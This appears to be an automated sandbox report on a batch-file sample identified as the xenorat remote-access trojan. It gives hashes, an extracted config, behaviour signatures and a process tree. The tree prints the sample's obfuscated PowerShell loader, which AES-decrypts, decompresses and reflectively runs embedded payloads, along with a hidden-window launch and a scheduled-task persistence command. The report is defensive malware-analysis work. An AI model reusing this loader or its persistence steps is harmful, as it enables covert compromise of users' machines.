Analysis
-
max time kernel
30s -
max time network
11s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
12-06-2024 22:23
Static task
static1
Behavioral task
behavioral1
Sample
sdsd.bat
Resource
win7-20240611-en
General
-
Target
sdsd.bat
-
Size
399KB
-
MD5
dedc70c320233bc67ceb02a9492f29d6
-
SHA1
d031a05a302501a50581a2338762013f60da62df
-
SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
-
SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
-
SSDEEP
6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG
Malware Config
Extracted
xenorat
127.0.0.1
-
delay
5000
-
install_path
temp
-
port
7788
-
startup_name
lol
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2032 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation sdsd.exe -
Executes dropped EXE 2 IoCs
pid Process 1668 sdsd.exe 4796 sdsd.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\lol svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 404 schtasks.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133627046440725541" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133627046519666538" svchost.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2032 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 1048 wrote to memory of 5040 1048 cmd.exe 93 PID 1048 wrote to memory of 5040 1048 cmd.exe 93 PID 1048 wrote to memory of 2032 1048 cmd.exe 94 PID 1048 wrote to memory of 2032 1048 cmd.exe 94 PID 2032 wrote to memory of 3428 2032 powershell.exe 56 PID 2032 wrote to memory of 1120 2032 powershell.exe 19 PID 2032 wrote to memory of 2556 2032 powershell.exe 45 PID 2032 wrote to memory of 968 2032 powershell.exe 12 PID 2032 wrote to memory of 4512 2032 powershell.exe 67 PID 2032 wrote to memory of 964 2032 powershell.exe 15 PID 2032 wrote to memory of 2300 2032 powershell.exe 41 PID 2032 wrote to memory of 1736 2032 powershell.exe 31 PID 2032 wrote to memory of 2320 2032 powershell.exe 42 PID 2032 wrote to memory of 1460 2032 powershell.exe 24 PID 2032 wrote to memory of 3300 2032 powershell.exe 54 PID 2032 wrote to memory of 1920 2032 powershell.exe 36 PID 2032 wrote to memory of 1520 2032 powershell.exe 26 PID 2032 wrote to memory of 1604 2032 powershell.exe 27 PID 2032 wrote to memory of 1908 2032 powershell.exe 35 PID 2032 wrote to memory of 916 2032 powershell.exe 11 PID 2032 wrote to memory of 1704 2032 powershell.exe 30 PID 2032 wrote to memory of 1304 2032 powershell.exe 22 PID 2032 wrote to memory of 1696 2032 powershell.exe 38 PID 2032 wrote to memory of 1096 2032 powershell.exe 18 PID 2032 wrote to memory of 4440 2032 powershell.exe 69 PID 2032 wrote to memory of 2068 2032 powershell.exe 39 PID 2032 wrote to memory of 3840 2032 powershell.exe 75 PID 2032 wrote to memory of 1076 2032 powershell.exe 17 PID 2032 wrote to memory of 1468 2032 powershell.exe 25 PID 2032 wrote to memory of 3036 2032 powershell.exe 52 PID 2032 wrote to memory of 1848 2032 powershell.exe 34 PID 2032 wrote to memory of 948 2032 powershell.exe 82 PID 2032 wrote to memory of 1644 2032 powershell.exe 29 PID 2032 wrote to memory of 1840 2032 powershell.exe 33 PID 2032 wrote to memory of 2428 2032 powershell.exe 43 PID 2032 wrote to memory of 408 2032 powershell.exe 14 PID 2032 wrote to memory of 60 2032 powershell.exe 16 PID 2032 wrote to memory of 3604 2032 powershell.exe 57 PID 2032 wrote to memory of 1828 2032 powershell.exe 32 PID 2032 wrote to memory of 1232 2032 powershell.exe 21 PID 2032 wrote to memory of 2608 2032 powershell.exe 48 PID 2032 wrote to memory of 1620 2032 powershell.exe 28 PID 2032 wrote to memory of 1220 2032 powershell.exe 20 PID 2032 wrote to memory of 792 2032 powershell.exe 8 PID 2032 wrote to memory of 4948 2032 powershell.exe 68 PID 2032 wrote to memory of 4372 2032 powershell.exe 70 PID 2032 wrote to memory of 2188 2032 powershell.exe 71 PID 2032 wrote to memory of 2580 2032 powershell.exe 47 PID 2032 wrote to memory of 2772 2032 powershell.exe 50 PID 2032 wrote to memory of 1392 2032 powershell.exe 23 PID 2032 wrote to memory of 2112 2032 powershell.exe 40 PID 2032 wrote to memory of 2564 2032 powershell.exe 46 PID 2032 wrote to memory of 1668 2032 powershell.exe 96 PID 2032 wrote to memory of 1668 2032 powershell.exe 96 PID 2032 wrote to memory of 1668 2032 powershell.exe 96 PID 1668 wrote to memory of 4796 1668 sdsd.exe 97 PID 1668 wrote to memory of 4796 1668 sdsd.exe 97 PID 1668 wrote to memory of 4796 1668 sdsd.exe 97 PID 4796 wrote to memory of 404 4796 sdsd.exe 98 PID 4796 wrote to memory of 404 4796 sdsd.exe 98 PID 4796 wrote to memory of 404 4796 sdsd.exe 98 PID 792 wrote to memory of 448 792 svchost.exe 101 PID 792 wrote to memory of 448 792 svchost.exe 101
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:448
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:60
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3300
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:5040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\sdsd.exe"C:\Users\Admin\AppData\Local\Temp\sdsd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "lol" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp" /F6⤵
- Creates scheduled task(s)
PID:404
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:3840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3884,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:81⤵PID:4764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
45KB
MD541146957ad1a37a26565c42ac174609a
SHA1622b3cd22edd11ba59ec438e14fe96d0c03d5026
SHA256320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc
SHA512d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d
-
Filesize
1KB
MD59ec91e3fb824c95fd8118ef24669988a
SHA15b6fe95c2a51b7ef0970c3b24844ece400e677ea
SHA25645d3489cde25df745a4f071d83d83fc6d9daddc03b3a680a5c3010e844ae38f5
SHA512b898e3d16d77d672b7f5d2c32ff2a5fbc6f71d1be5ed12c2981cabd4ef90315b36512335a15d2c3cbe0bb24539b6ccd37ea1771521f9487f2d915c148fc02fc2